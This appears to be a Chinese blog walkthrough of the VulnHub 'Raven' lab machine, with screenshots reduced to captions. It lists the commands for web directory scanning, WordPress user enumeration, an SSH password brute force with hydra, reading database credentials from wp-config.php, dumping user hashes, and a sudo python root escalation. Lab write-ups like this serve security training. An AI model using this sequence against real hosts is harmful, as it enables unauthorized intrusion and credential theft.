vulnhub-raven

vulnhub-raven

靶机下载:https://download.vulnhub.com/raven/Raven.ova
kali:nat模式,靶机也nat模式
探测主机

vulnhub-raven_第1张图片

扫描端口

vulnhub-raven_第2张图片

访问网站,查看源代码,看到service.html访问看到flag1vulnhub-raven_第3张图片
dirb http://192.168.11.128看到wordpress

vulnhub-raven_第4张图片

wpscan --url http://192.168.11.128/wordpress -e u

vulnhub-raven_第5张图片

hydra -l michael -P rockyou.txt 192.168.11.128 ssh

vulnhub-raven_第6张图片

ssh [email protected]

vulnhub-raven_第7张图片

cd /var/www/html/wordpress/
ls

vulnhub-raven_第8张图片

cat wp-config.php

vulnhub-raven_第9张图片

mysql -u root -p

vulnhub-raven_第10张图片

show databases;
use wordpress;
show tables;

vulnhub-raven_第11张图片

select * from wp_users;MD5解码

vulnhub-raven_第12张图片

exit
su steven

vulnhub-raven_第13张图片

sudo python -c 'import pty;pty.spawn("/bin/bash")
whoami

vulnhub-raven_第14张图片

cd …/…/
cat flag2.txt

vulnhub-raven_第15张图片

你可能感兴趣的:(linux,安全)